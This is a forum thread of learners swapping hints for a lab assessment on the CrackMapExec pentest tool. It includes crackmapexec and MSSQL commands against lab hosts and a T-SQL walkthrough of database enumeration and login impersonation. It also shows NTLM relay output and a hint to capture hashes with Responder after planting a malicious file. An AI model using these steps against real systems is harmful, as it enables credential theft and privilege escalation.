Using CrackMapExec - Skills Assessment

Module completed. If you need help, message me, or simply ask in a forum.

I found the users je and al, with their passwords. Both are DC users but not local. I have read this post several times and I don’t know how to get j*s’s password. I used LDAP and SMB enumeration for Kerberos and ASREPRoast.

Any hint to continue with the module?

Did you get the flag from SQL01?
After that you get usernames with their passwords from the databases.

j*s’s password comes after…

You have to enumerate the database in order to proceed.

Thanks for your help. I checked each of the databases and got the following information:

Databases enumerated: master / tempdb / model / msdb / interns

It only shows tables for the databases msdb / master. When I checked the tables one by one I didn’t find a table with usernames.

The users J----e and At–l were not local users on 172.15.15.15.

You are getting hot…

Try this: SELECT * FROM [interns].[dbo].details

I can’t see the tables of the interns database…

sudo proxychains4 -q crackmapexec mssql 172.16.15.15 -u J****** -p ****** -q "SELECT table_name from interns.INFORMATION_SCHEMA.TABLES"
MSSQL 172.16.15.15 1433 SQL01 Windows 10 / Server 2019 Build 17763 (name:SQL01) (domain:INLANEFREIGHT.LOCAL)
MSSQL 172.16.15.15 1433 SQL01 [+] INLANEFREIGHT.LOCAL\J******:P********

Your command:
sudo proxychains4 -q crackmapexec mssql 172.16.15.15 -u J****** -p ******** -q "SELECT * FROM [interns].[dbo].details"
MSSQL 172.16.15.15 1433 SQL01 [*] Windows 10 / Server 2019 Build 17763 (name:SQL01) (domain:INLANEFREIGHT.LOCAL)
MSSQL 172.16.15.15 1433 SQL01 [+] INLANEFREIGHT.LOCAL\J*****:********

You need mysql creds to enumerate the SQL database.

Delete the post, don’t show passwords like that.

Try 172.16.15.3 a**** --spider DEV --pattern txt

Then use --get-file to get whatever you found in the DEV share.

This will get you to SQL01.

Then try SELECT * FROM [interns].[dbo].details

But there is also a flag on that machine; you will have to priv, then impersonate, and more: c:\Users\Public\flag.txt

So you will get 2 things so you can continue.
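The hints above (enumerate the databases, find the table in the interns database, then check what you can impersonate) are the usual MSSQL enumeration sequence. The T-SQL below is an added example written for this thread, not a command from any participant or from the module itself; each statement can be passed to crackmapexec's mssql -q option one at a time. It assumes the database name interns and a table dbo.details from the thread; the login name sa in the last step is a placeholder that must be replaced with whatever the impersonation query actually returns.

```sql
-- Added example (not from the thread). Run each statement with:
--   crackmapexec mssql <host> -u <user> -p <pass> -q "<statement>"

-- 1. Which databases exist, and which ones can the current login open?
SELECT name, HAS_DBACCESS(name) AS accessible FROM sys.databases;

-- 2. Tables (with schema) inside a database the login can access.
--    "interns" is taken from the thread; adjust for other targets.
SELECT table_schema, table_name FROM interns.INFORMATION_SCHEMA.TABLES;

-- 3. Dump a table once its schema and name are known.
SELECT * FROM [interns].[dbo].[details];

-- 4. Who am I, and am I already sysadmin?
SELECT SYSTEM_USER AS login_name, IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- 5. Logins that the current login is allowed to impersonate.
SELECT DISTINCT b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE';

-- 6. Switch to one of those logins and re-check privileges.
--    'sa' is a placeholder: substitute a name returned by step 5.
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER AS login_name, IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;
REVERT;
```

Step 5 only lists explicit IMPERSONATE grants; if it returns nothing, the path forward is elsewhere (linked servers, database roles, or a different set of credentials), so do not assume impersonation is always the answer.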

Thanks for your support, excellent explanation. It was funny when I got the creds file, but the username has 2 symbols. I said ■■■.

But I can continue with your support. Thanks, my friend.

Those 2 symbols are encoding errors; they mean nothing, just ignore them.
Now you are on a right track.

Hello friend.
This weekend I was trying to answer question 3 (DEV01). The server only responds to me with the SMB protocol (domain users). I checked the shared folders as you indicated in question 2 and there is no interesting information.

What should I do? I have checked all the sections several times.

Hi, friend.

I have a question. I executed an ntlmrelay attack and I got a connection attempt from user james that said SUCCEED.

Results:

[*] SMBD-Thread-4 (process_request_thread): Connection from INLANEFREIGHT/JAMES@10.129.204.182 controlled, attacking target smb://172.16.15.20
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Authenticating against smb://172.16.15.20 as INLANEFREIGHT/JAMES SUCCEED

What should I do to get the hash?

Hi, Halfluke.
I’m stuck at question 3; I have checked all the sections for this module.

I have a question about question 3. I executed an ntlmrelay attack and I got a connection attempt from user james that said SUCCEED.

Results:

[*] SMBD-Thread-4 (process_request_thread): Connection from INLANEFREIGHT/JAMES@10.129.204.182 controlled, attacking target smb://172.16.15.20
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Authenticating against smb://172.16.15.20 as INLANEFREIGHT/JAMES SUCCEED

What should I do to get the hash? Any suggestions?

Sorry, I am currently on vacation with no access to my notes. Sorry about that.

Hi reyjem,

I have completed this module, and I did not use ntlmrelayx for that. I recommend you use Responder instead. You should receive the ***** hash within a minute or so. Obviously, this approach will only work if you have dropped a malicious file somewhere…

Hi, @emer1ca. Yesterday I checked everything and I found the hash.
I got the answer for question 3.

This morning I got the answer for question 4.

Any hint for question 5?

Hi, @anichols9.

I’m on the last question, but I checked your post and I saw you got the password for user svc_inlaneadm. I don’t have it.

should I have it to solve the last question?

I’m stuck at question 5

Any hint?